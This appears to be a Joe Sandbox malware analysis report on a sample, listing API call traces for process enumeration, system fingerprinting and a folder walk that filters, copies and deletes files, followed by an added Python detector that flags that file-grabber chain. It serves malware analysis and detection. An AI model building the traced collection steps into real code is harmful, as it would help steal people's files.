                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 396451647-0
                                    • Opcode ID: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                    • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                    • Opcode Fuzzy Hash: ee457ade85a58c401a034cc046952df660dfe0af018f09e7080f0d4154ab9e94
                                    • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 007F8931
                                    • Process32First.KERNEL32(?,00000128), ref: 007F8945
                                    • Process32Next.KERNEL32(?,00000128), ref: 007F895A
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • CloseHandle.KERNEL32(?), ref: 007F89C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                    • Instruction ID: 647dec7101601ceb5ba0a6e474531da068432217f876f561291cf2368fc9717a
                                    • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                    • Instruction Fuzzy Hash: 38315EB190121CEBCB64DF90DD55FFEB778EB45700F108199A20DA2290DB786E44CFA2
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                    • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • CloseHandle.KERNEL32(?), ref: 00418761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                    • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                    • Opcode Fuzzy Hash: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                    • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                    APIs
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                    • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                    • lstrcatA.KERNEL32(?,00A12F50), ref: 00414FAB
                                    • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                    • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                    • Opcode Fuzzy Hash: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                    • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                    • wsprintfA.USER32 ref: 00418850
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 2716131235-2206825331
                                    • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                    • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                    • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                    • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcessstrtok_s
                                    • String ID:
                                    • API String ID: 3407564107-0
                                    • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                    • Instruction ID: 5c5aae387920a935ba995ae77528c17e39cb89d9a2ba678576196460739acfc6
                                    • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                    • Instruction Fuzzy Hash: 4C1116B490120DEFCB04DFE4D958AFDBBB9FF04305F508469EA0AA6250E7746B44CB66
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 007F7C17
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7C1E
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 007F7C2B
                                    • wsprintfA.USER32 ref: 007F7C5A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction ID: 6defce09804016e146fa15f6920e0dd4656227ad1cdadd6d9d47392815d5cafa
                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction Fuzzy Hash: 2A1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                    • wsprintfA.USER32 ref: 004179F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 1243822799-0
                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 007F7CCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7CD1
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 007F7CE4
                                    • wsprintfA.USER32 ref: 007F7D1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                    • Instruction ID: 57cc79f3daa855ea8e99f03f98598ea04790b6be26f27f7730785baa05c248a7
                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                    • Instruction Fuzzy Hash: 68115EB1A49218EFEB248F54DC49FA9B7B8FB05721F1043DAE61AA32C0C7785940CF51
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strtok_s
                                    • String ID:
                                    • API String ID: 3330995566-0
                                    • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                    • Instruction ID: 9d67ccc373d8bb28dd9cf01f35e6dc4f8b295b209e9553e4741b1ebe3b2cf270
                                    • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                    • Instruction Fuzzy Hash: 9C11C5B4E40209EFDB14CFE6D948AAEB7B5BB04745F10C029E125A6250D7B8A605CF65
                                    APIs
                                    • CreateFileA.KERNEL32(007F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,007F3D55,?), ref: 007F9563
                                    • GetFileSizeEx.KERNEL32(000000FF,007F3D55), ref: 007F9580
                                    • CloseHandle.KERNEL32(000000FF), ref: 007F958E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction ID: 5193c814e6dbdc472404c9dd9fc82c9ffb8f2366a2d1d6e51c8a242deebc76ac
                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction Fuzzy Hash: E1F04F39E40208BBDB20DFF0DC49BAE77BAEB49710F10C654FB11A72C0D63996118B41
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D31
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D4F
                                    • CloseHandle.KERNEL32(00000000), ref: 007F6D60
                                    • Sleep.KERNEL32(00001770), ref: 007F6D6B
                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D81
                                    • ExitProcess.KERNEL32 ref: 007F6D89
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                    • Instruction ID: 7f06078158e00ce1db07e51b357041f4de053ec514972b12c1ef89b0c4c8b917
                                    • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                    • Instruction Fuzzy Hash: 13F058B8B8060DFEEB10ABE0DC0ABBD7675FB05741F201A18F702A5390CBB84500CA66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: `o@
                                    • API String ID: 0-590292170
                                    • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                    • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                    • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                    • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                    APIs
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                    • lstrcatA.KERNEL32(?,00A1A040), ref: 00414C08
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00A130A0,?,000003E8), ref: 00414A4A
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
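As an added example (not part of the Joe Sandbox report and not the sample's own code), the API trace listed above is parsed from the report's own line format and checked for the stages of a file-grabber loop: resolve a root folder (SHGetFolderPathA), walk it (FindFirstFileA / FindNextFileA / FindClose), skip the two directory entries the walk always returns first (the two consecutive StrCmpCA calls after FindFirstFileA; the report shows only string addresses, so reading them as "." and ".." is an assumption), filter names (PathMatchSpecA), copy matches to a staging location (CopyFileA) and delete afterwards (DeleteFileA). The stage names, the classifier heuristic and the functions `parse_api_line`, `parse_report` and `classify_file_grabber` are this example's own; the sample lines are copied from the report text.

```python
"""Added example, not part of the Joe Sandbox report and not the sample's code.
Parses the report's API trace lines and checks whether they form the
enumerate / filter / copy / delete chain of a file-grabber routine.
Stage names and the heuristic are assumptions of this example."""
import re
from typing import NamedTuple, Optional

# One trace line looks like:
#   [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX
# wsprintfA lines carry no argument list and no comma before "ref:".
_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

class ApiCall(NamedTuple):
    api: str
    module: str
    args: tuple
    ref: str
    subcall: Optional[str]  # address of the sub-function the call belongs to, if any

def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; return None for headers or other non-API text."""
    m = _LINE.match(line.strip().lstrip("• ").strip())
    if not m:
        return None
    args = tuple(a for a in (m.group("args") or "").split(",") if a)
    return ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub"))

def parse_report(lines):
    return [c for c in (parse_api_line(l) for l in lines) if c]

# Stage -> APIs that evidence it (ANSI and wide variants). Assumed taxonomy.
STAGES = {
    "root_path": {"SHGetFolderPathA", "SHGetFolderPathW"},
    "enumerate": {"FindFirstFileA", "FindNextFileA", "FindFirstFileW", "FindNextFileW"},
    "skip_dot_dirs": {"StrCmpCA", "StrCmpCW"},
    "name_filter": {"PathMatchSpecA", "PathMatchSpecW"},
    "stage_copy": {"CopyFileA", "CopyFileW"},
    "cleanup": {"DeleteFileA", "DeleteFileW"},
}

def classify_file_grabber(calls):
    """Return which stages are present and whether the core chain is complete."""
    hits = {stage: [c for c in calls if c.api in apis] for stage, apis in STAGES.items()}
    found = {s for s, v in hits.items() if v}
    # String compares only count as the "." / ".." skip when at least two of them
    # sit in the same sub-function as the directory enumeration.
    enum_subs = {c.subcall for c in hits["enumerate"]}
    if len([c for c in hits["skip_dot_dirs"] if c.subcall in enum_subs]) < 2:
        found.discard("skip_dot_dirs")
    # CopyFile's third argument is bFailIfExists; 1 means staged files are never overwritten.
    no_overwrite = any(c.args[-1:] == ("00000001",) for c in hits["stage_copy"])
    core = {"enumerate", "name_filter", "stage_copy"} <= found
    return {"stages": sorted(found), "copy_fail_if_exists": no_overwrite, "file_grabber": core}

# Copied from the report's API list for the function above (bullets removed).
REPORT_LINES = [
    "Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B",
    "lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA",
    "lstrcatA.KERNEL32(?,00A1A040), ref: 00414C08",
    "Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C",
    "Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943",
    "Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971",
    "Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987",
    "Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D",
    "Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92",
    "Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E",
    "Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC",
    "Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31",
    "Strings",  # section header from the report; the parser must ignore it
]

if __name__ == "__main__":
    print(classify_file_grabber(parse_report(REPORT_LINES)))
```

The heuristic deliberately requires the enumerate, filter and copy stages together: a function that only concatenates paths and iterates a directory (several of the other entries on this page) is a plain directory walk, and on its own it is not evidence of collection.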
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: UaA
                                    • API String ID: 2104210347-3893042857
                                    • Opcode ID: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                    • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                    • Opcode Fuzzy Hash: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                    • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SystemTimelstrcpy
                                    • String ID: cI@$cI@
                                    • API String ID: 62757014-1697673767
                                    • Opcode ID: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                    • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                    • Opcode Fuzzy Hash: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                    • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                    APIs
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                    • lstrcatA.KERNEL32(?,00A192F8), ref: 004150A8
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
